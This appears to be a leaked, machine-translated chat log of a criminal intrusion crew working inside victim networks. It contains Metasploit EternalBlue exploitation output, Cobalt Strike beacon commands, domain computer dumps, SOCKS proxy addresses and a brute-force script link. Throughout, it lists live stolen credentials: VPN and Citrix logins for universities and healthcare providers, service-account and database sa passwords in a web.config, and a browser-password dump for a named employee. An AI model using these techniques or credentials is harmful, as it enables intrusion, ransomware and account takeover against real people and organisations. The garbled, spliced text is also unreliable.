Probably not. It could be admin/smb/ms17_010_command but it doesn't work and I think it could be exploit/windows/smb/ms17_010_psexecheck the options through external blu?
look... there seems to be a module that can run an echo via this splot?
[*] 10.7.0.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.7.0.73:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit)
[*] 10.7.0.73:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply.
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 70 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 12 Groom Allocations.
[*] 10.7.0.73:445 - Sending all but last fragment of exploit packet
[*] 10.7.0.73:445 - Starting non-paged pool grooming
[+] 10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[*] 10.7.0.73:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 10.7.0.73:4444
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply.
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 70 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 17 Groom Allocations.
[*] 10.7.0.73:445 - Sending all but last fragment of exploit packet
[*] 10.7.0.73:445 - Starting non-paged pool grooming
[+] 10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[*] 10.7.0.73:445 - Triggering free of corrupted buffer.
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply.
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 70 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 22 Groom Allocations.
[*] 10.7.0.73:445 - Sending all but last fragment of exploit packet
[*] 10.7.0.73:445 - Starting non-paged pool grooming
[+] 10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[*] 10.7.0.73:445 - Triggering free of corrupted buffer.
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.

``and what axis? and the first question?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=Y64nWyXyE2kdkcJyf) hztachka sees the internet? scanner says vulnerable? found 1710 but can not exploit.nothing yet, try other methods, on these 2 pulls nothing to do at all so here we have what? hmOn the first two times did not shoot, but then took it off. HZ maybe I saved crookedly, but I know for sure that I re-shot because the file was ripped off what the fuck is it calledget-computers take it off via pc commandlet if ad_find.exeCMDNot via cmd take it off via pc about what?) No, via cmd via pc? What the fuck is that? See, I re-shot it twice. you know that it is not complete? on ad_computers``.
 ASPDC4$
 ASPDC5$
 ASPDPM2$
 CFSQL2$
 CFSQLTEST1$
 CFWEB1$
 CFWEBTEST1$
 WIN7_VM$
 sccmservice1$
 ASPDPM3$
 ASPVCS1$
 WIN7VDI-PC$
 BOBM$
 BBCTX3$
 BBCTX2$
 BBCTX4$
 BBCTX1$
 BBGW3$
 ASPUTIL2$
 ASPXA3$
 BBGW1$
 FCCTX3$
 CFCTX2$
 WMLXA1$
 ASPXA1$
 XENAPP76$
 ASPXA7$
 XENAPP71-2$
 ASPXA9$
 CFHV1$
 BBCTX6$
 ASPXA5$
 ASPFS1$
 BBCTX5$
 BBCTX7$
 ASPSQL2$
 ASPXA6$
 BBCTX8$
 ASPXA4$
 CFXA1$
 ASPXA2$
 ASPXA10$
 ASPXA8$
 XENAPP71$
 RCMTESTTS$
 ASPSAN2012$
 RCM2012$
 ASPUTIL3$
 NTIXA1$
 NTIGSS1$
 NTISAGE1$
 NTISAGE2$
 ASPXA11$
 PHXADC1$
 PHXA-1$
 ASPXA65TEMPLATE$
 XENAPP76PILOT$
 USCXA1$
 USCFS1$
 ASPSYM1$
 KOMIGTEST2008R2$
 DRUTIL01$
 ASPDC3$
 MVEXA1$
 DMGXA1$
 MVEFS1$
 NTIW71$
 EGMANAGER$
 EGCOLLECTOR$

``How many npc have there been? What makes you think it's taking so long?`` It's all hovering.`` In sitrix for aspsql2svc There are no resources currently available for this user.`` The admin locked up
Your credentials are invalid. Try again or contact your system administrator.
``I didn`t notice it before so always use it? The script does not pass the host list is autobroot, not smbshare host list? https://github.com/leaderimStalin/psbrau/blob/main/Invoke-SMBAutoBrute.ps1что for autobroot? autobroot does not work in tpsql2svc where admin will be fine
 see cmbshars under 2 polzakamyparu minu of this``.
C:\Windows\system32
BBCTX5 @ MAPCIASP\aspsql2svc
``No username under which it's under ][ ](https://mediaeveryone.com/group/mapciasp-com?msg=bctF5N752KHAooiC4) ?net tse it's no username I know) so it's on the current host)``
C:\Windows\system32
BBCTX5 @ MAPCIASP\aspsql2svc

``The session in tpsh is under them.
 But I can run cmd and ps under these cres
``tacnfr you say access denied? where to run and how? But under these creeds can run cmd and psAccess deniedLjcneg pfrhsn what error? Various, wmic, ViewSQLk how do you try that does not connect? With these creds do not connect to the server ASPSQL2.mapciasp.com. Under these creeds and do not start the load. These creeds = user:aspsql2svc pwd:map#2013 I don't understand something.
No connection to ASPSQL2.mapciasp.com with the credentials, no view of the directory via wmic
Can't connect with cradles at ASPSQL2.mapciasp.com, can't see directory through wmic. Managed to run under creeds poewershell. From aspsql2svc tried to run the load, nothing.yes?This pwd: map#2013:thumbsup:will we parse the new tool and method[ ](https://mediaeveryone.com/channel/general?msg=32qzfSYtweTWNgzoD) ?everyone will have to read and get into at least there will be a process updated will we?you can finish with the current tasks and move smoothly to #sisd-petneav ptsh no possibility to run sharp files from memory ? i build you under x64 dll + all build with x64 check ? give the file silkoddelki palsanyeada no new cobalt ?was the cleanest of the lastllvm can buildCryptor clean have? in half an hour there will be a meeting and we'll discuss everything will close in an hour[ ](https://mediaeveryone.com/channel/general?msg=DQgoiuMG8xsQZaxZo) something silent dep(ok, now I'll try it in 3-4 koba depa will probably take a load of clean for each personal koba bildche with bildche?
https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!!!

```
@user7```
https://cloudgw.cpcc.edu/vpn/index.html sperez14 Lisbeth1219

```
@user3 check, you had it in the works```
https://vlab.unf.edu/vpn/index.html n00647072 fLORIDAHISTORY2074!

```
Is @user8 still available to replace ?@tl1 is there anything else? Your credentials are invalid. Try again or contact your system administrator.
https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears
```
@user3 replacement, so it's clean ```.
Cannot find path 'C:\Users\Healdton.IT\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine' because it does not exist.
``Yes, fine-tuning the computer, if you get an error after running the above command, you can check the default path manually
```
dir $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine
So you're out of a job? And once again, I gave you a report on each of the two you gave me. One in the confab and the other in general. In one of the data is jammed, the second can not run cmd ``.
Get-PSReadLineOption
```
last time, write down the accesses are dead and the network is dead?
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx

```
I have this network open on you, did you write to #general or to the confab? okReinstalling the OS on your computer. You blacked out and didn't see the partitions in #general? So what have you been doing? I've been texting you on every single one.
https://paloca.cernerworks.com/citrix/prodweb/

``````
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx

``````
https://paloca.cernerworks.com/citrix/prodweb/

``Yesterday with everyone on the networks, what's in work[ ](https://mediaeveryone.com/channel/general?msg=KkJ6tAjTNcYQip8Q5) What? [ ](https://mediaeveryone.com/channel/general?msg=7q8mQHmN7r28bkXnh) What do you mean yesterday missed? All died? What are you doing? I have 2 networks on you, I created you yesterday missed? Are you kidding, man? I wrote to you yesterday that the data is blockedpotomo created a hell of a conf[ ](https://mediaeveryone.com/channel/general?msg=ovxt4rPWrkyc7Tmzt) work you wrote back ok, you have progress on the grid or what? in trete look all there is a session domain `stg-healthcare.com` From where? @tl1 On what? @user3 not yet answered my question to me understand[ ](https://mediaeveryone.com/channel/general?msg=g8Qfkuof4BoNauGRY) ask about the loadNow if I think about it logically from your suggestion about the load how can I know about it? How do I know that @user3 is working with tpsh>I refer you to @user3 he works with tpsh>and you are in one place in this forum already met the information about this I do not know that someone else in tpsh could give me the load?[ ](https://mediaeveryone.com/channel/general?msg=hPxT9hsQA8o3dFvqP) i already answered in #general all sit there 2 people besides me had access therewas 5 people in one place[ ](https://mediaeveryone.com/channel/general?msg=5mapbAMAwqNMc4RMF) m? and got nothing i posted about it yesterday and i see that you chose to wait 4 hours ask your colleagues coba pulled or la/da got? i had a choice? 4 hours of what? just sat for 4 hours? i waited for it yesterday @user8 what have you been doing for the last 4 hours? waiting for the load? we could not press 2 buttons and give the load to a colleague? me and @user8 ?how many people in the team? what more accurate? > i need a team to spawn in tcph.stg-healthcare.com[ ](https://mediaeveryone.com/channel/general?msg=aeofhWmcgAmQw4Ah2) that is the team in tpsh can?[ ](https://mediaeveryone.com/channel/general?msg=pGT2JSTaectAeK8Mm) more accurate? i had the same as i wrote in the chat
roth trying to make portfwd does not want to workNormalized build alreadya command to tpsh can? how are you doing?:v:no thanksZe8ZW53FztpsVFTuser3a password can not rememberwhat - what? his, he rearranged the system what login?@tl1 stalin in the rocket can not authorize, throw the password will be todaybuild? and the rocket was lying and could not go in any way rdp, because access in the rocket is lying for tpslichno i command wait for what? wait for what?
i need a command to spawn in tpsh for the net `tcph.stg-healthcare.com` what are you doing now? hello, we too hello, i was the only one lying roquet? hello? it seems pinged first from dc, then from the car admins, everywhere 100% loss another network segment is visible? ok, then skip it, see what the other addresses are yes it was cut off?
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 02:36:56> shell ping 192.168.100.247 -n 1
[*] Tasked beacon to run: ping 192.168.100.247 -n 1
[+] host called home, sent: 68 bytes
[+] received output:

Pinging 192.168.100.247 with 32 bytes of data:
Request timed out.

Ping statistics for 192.168.100.247:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

```
understandable (doesn't even let you log in ```
The connection has timed out

The server at 192.168.100.247 is taking too long to respond.

    The site could be temporarily unavailable or too busy. Try again in a few moments.
    If you are unable to load any pages, check your computer's network connection.
    If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.
``172.93.105.2:18541 give soxy from dk under tokeno and from owner's car Disks are seen from outside? and sox from owner's car? the same crap now i will try from other proxy other place threw? other links then opens so proxy fell off not?i have tried other links but the proxy is down then why not just hit the console and then the white screen?and it takes a long time to load just press enter and it knocks out[ ](https://mediaeveryone.com/group/waterway-com?msg=wqSewELvNyiwWnvd2) no what's inside? something interesting so`http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!``@tl1 @tl2 ``WATERWAY\mharper LoveUnit14`` isn't done yet, let's double-check everything from the browsers and move on``MACMINI-EDC269`what hostname? not taimmachine by any chance[ ](https://mediaeveryone.com/group/waterway-com?msg=7TsNZAcfpHzmPd98t) haven't you finished opening port? ``192.168.6.160\posserver01\PPXMLData L00k4MyD@ta`Carbonite BackupMac
```
192.168.0.233:5900
192.168.0.233:3283
192.168.0.233:88
192.168.0.233:22 (SSH-2.0-OpenSSH_8.1)
192.168.0.233:445
````\\WWSQL\S$\SQLBackup`\\\W2K1\F$\Data\AKPRO_Data\BACKUPS`\\\\W2K1\F$\Backup`\\\W2K1\Data\AKPRO_Data\BACKUPS````
<?xml version="1.0"?><configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">
  
    <appSettings/>
    <connectionStrings>
        <add name="CCCConnectionString" connectionString="Data Source=wwsql;Initial Catalog=CCC;Persist Security Info=True;User ID=sa;Password=2Vanilla1"
            providerName="System.Data.SqlClient" />
        <add name="DevelopmentConnectionString1" connectionString="Data Source=wwsql2;Initial Catalog=Development;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
      <add name="PDIConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=PDI;User ID=sa;Password=Gators1853"
          providerName="System.Data.SqlClient" />
        <add name="SharedConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Shared;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="DevelopmentConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Development;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="IntranetConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Intranet;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="SharedConnectionStringWSQL2" connectionString="Data Source=wwsql2;Initial Catalog=Shared;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="CCCConnectionString2" connectionString="Data Source=wwsql;Initial Catalog=CCC;Persist Security Info=True;User ID=sa;Password=2Vanilla1"
            providerName="System.Data.SqlClient" />
        <add name="WWBackOfficeConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=WWWBackOffice;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="TestConnectionString" connectionString="Data Source=BRIAN3;Initial Catalog=Test;Integrated Security=True"
            providerName="System.Data.SqlClient" />
        <add name="TestConnectionStringWWSQL2" connectionString="Data Source=WWSQL2;Initial Catalog=Test;Integrated Security=True"
            providerName="System.Data.SqlClient" />
        <add name="TestConnectionString2" connectionString="Data Source=WWSQL2;Initial Catalog=Test;Integrated Security=True"
            providerName="System.Data.SqlClient" />
        <add name="WWSQL2Test" connectionString="Data Source=WWSQL2;Initial Catalog=Test;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="VendorTestConnectionString3" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="ParametersTest3" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="TestConnectionString3" connectionString="Data Source=WWSQL2;Initial Catalog=Test;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="POItemsConnectionString4" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="POItemsConnectionString5" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="POItemsConnectionString6" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="POItemsConnectionString7" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="ChemicalConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Chemical;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="DevelopmentConnectionString2" connectionString="Data Source=wwsql2;Initial Catalog=Development;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="ManagementInfoConnectionString" connectionString="Data Source=WWSQL2;Initial Catalog=ManagementInfo;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="SQIConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=SQI;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="ReportsConnectionString" connectionString="Data Source=reports;Initial Catalog=ExternalProcs;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="FinancialConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Financial;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="InventoryConnectionString" connectionString="Data Source=WWSQL2;Initial Catalog=Inventory;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="CouponsConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Coupons;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="LaborConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Labor;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="DataWarehouseConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=datawarehouse;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="MorningConnectionString" connectionString="Data Source=WWSQL2;Initial Catalog=Morning;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
      <add name="EJConnectionString" connectionString="Data Source=WWSQL2;Initial Catalog=ElectronicJournals;User ID=sa;Password=Gators1853"
          providerName="System.Data.SqlClient" />
    </connectionStrings>
	<system.net>
		<mailSettings>
			<smtp>
				<network
      host="msmr1.datotel.com"
      port="25"
	  defaultCredentials="true" />
			</smtp>
		</mailSettings>
	</system.net>
    <system.web>
      <httpHandlers>
        <add path="Reserved.ReportViewerWebControl.axd" verb="*" type="Microsoft.Reporting.WebForms.HttpHandler, Microsoft.ReportViewer.WebForms, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
          validate="false" />
      </httpHandlers>
      <customErrors mode="Off"/>
      <compilation debug="true">
        <assemblies>
          <add assembly="Microsoft.ReportViewer.WebForms, Version=8.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
          <!--<add assembly="Microsoft.ReportViewer.Common, Version=8.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />-->
        </assemblies>
        <buildProviders>
          <add extension=".rdlc" type="Microsoft.Reporting.RdlBuildProvider, Microsoft.ReportViewer.Common, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
        </buildProviders>
      </compilation>
      <!--
            Set compilation debug="true" to insert debugging
            symbols into the compiled page. Because this
            affects performance, set this value to true only
            during development.

            Visual Basic options:
            Set strict="true" to disallow all data type conversions
            where data loss can occur.
            Set explicit="true" to force declaration of all variables.
        -->
	 <pages>
            <namespaces>
                <clear/>
                <add namespace="System"/>
                <add namespace="System.Collections"/>
                <add namespace="System.Collections.Specialized"/>
                <add namespace="System.Configuration"/>
                <add namespace="System.Text"/>
                <add namespace="System.Text.RegularExpressions"/>
                <add namespace="System.Web"/>
                <add namespace="System.Web.Caching"/>
                <add namespace="System.Web.SessionState"/>
                <add namespace="System.Web.Security"/>
                <add namespace="System.Web.Profile"/>
                <add namespace="System.Web.UI"/>
                <add namespace="System.Web.UI.WebControls"/>
                <add namespace="System.Web.UI.WebControls.WebParts"/>
                <add namespace="System.Web.UI.HtmlControls"/>
            </namespaces>
        </pages>
        <!--
            The <authentication> section enables configuration
            of the security authentication mode used by
            ASP.NET to identify an incoming user.
        -->
        <authentication mode="Windows"/>
      <identity impersonate="true"/>
        <!--
            The <customErrors> section enables configuration
            of what to do if/when an unhandled error occurs
            during the execution of a request. Specifically,
            it enables developers to configure html error pages
            to be displayed in place of an error stack trace.

        <customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
            <error statusCode="403" redirect="NoAccess.htm" />
            <error statusCode="404" redirect="FileNotFound.htm" />
        </customErrors>
        -->
    </system.web>
</configuration>

````\\REPORTING\D$\SQLBackup`mb
i just remember that there were two eshi's backed up somewhere in the vg? what's solar? mbr solar? well they restored the network there almost in one click the guys who were doing missed something very important, i myself do not know exactly what it was
there was a full restorbla ... LOL@tl1 @tl2
C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe
C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe
``They've got bitdefender here,``
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://designcloud.mockflow.com/,https://designcloud.mockflow.com/,1/19/2017 12:11:15 PM,13129323075436512,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.microsoftonline.com/,https://login.microsoftonline.com/common/oauth2/authorize,1/20/2017 8:36:53 AM,13129396613038827,gkeller@waterway.com,W
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.google.com/,https://accounts.google.com/ServiceLogin,2/16/2017 2:48:17 PM,13131751697642844,waterwaytesting@gmail.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.hotschedules.com/,https://www.hotschedules.com/hs/login.jsp,2/28/2017 2:01:56 PM,13132785716990422,2120689,1534603
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:20 AM,13134500840455937,admin,1Vanilla2
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:37 AM,13134500857385618,Admin,1Vanilla2
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.showmecables.com/,https://www.showmecables.com/customer/account/login/,4/17/2017 11:16:04 AM,13136919364519382,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/AuthenticationCT2/LoginAuthentication.aspx,1/20/2017 2:44:21 PM,13129418661810114,,12344321
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://securetest.i9.talx.com/,https://securetest.i9.talx.com/I9ExpressCT2/PostAuthenticated/EmployerReview.ascx,8/28/2017 1:23:59 PM,13148418239868206,,12344321
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/AuthenticationCT2/LoginAuthentication.aspx,1/20/2017 2:44:21 PM,13129418661810114,,12344321
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login5.silverpop.com/,https://login5.silverpop.com/login,1/27/2017 10:17:28 AM,13130007448689450,transact@waterway.com,Waterway!999
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,GKoct2020!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sandbox.authorize.net/,https://sandbox.authorize.net/UI/themes/anet/logon.aspx,3/3/2017 1:32:50 PM,13133043170642560,gkeller727,GKoct2020!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway.pingboard.com/,https://waterway.pingboard.com/invitation/accept,1/22/2018 2:49:00 PM,13161127740422083,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.authorize.net/,https://login.authorize.net/,7/21/2018 8:03:37 AM,13176651817834997,gkeller727,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://id.atlassian.com/,https://id.atlassian.com/signup/invite,11/15/2017 9:45:06 AM,13155234306572101,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sso-prod.insite360.gilbarco.com/,https://sso-prod.insite360.gilbarco.com/auth/realms/people/login-actions/authenticate,1/19/2017 9:11:07 AM,13129312267171112,gkeller@waterway.com,GKoct2015!
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://invitations.microsoft.com/,https://invitations.microsoft.com/signup,9/24/2018 1:18:57 PM,13182286737852274,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://pdiconnections.force.com/,https://pdiconnections.force.com/pdiconnections/Login,8/4/2017 8:50:19 AM,13146328219423516,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://pdiprodweb/,http://pdiprodweb/FocalPoint/Login.aspx,1/26/2018 9:18:55 AM,13161453535823207,waterway\gkeller,GKoct2015!
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,http://itprograms/,http://itprograms/pro_users/login,1/18/2017 6:03:47 PM,13129257827373174,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://github.com/,https://github.com/session,1/18/2017 6:28:21 PM,13129259301326003,gkellerww,GKoct2015!
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://smartscan.controlscan.com/,https://smartscan.controlscan.com/security/index/0/overview,1/3/2019 2:56:52 PM,13191022612362998,650000010503764,u7i2jwPWZdfCwcU
C:\Users\gkeller.WATERWAYAppData\Local\Google\Chrome\User Data\Default\Login Data,https://auth.monday.com/,https://auth.monday.com/users/invitation/accept,12/31/1600 6:00:00 PM,0,Greg Keller,kJHA2x9qfXmFM6U
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterwaytraining.litmos.com/,https://waterwaytraining.litmos.com/account/Login,2/25/2019 3:37:37 PM,13195604257652268,gkeller@waterway.com,Waterway99
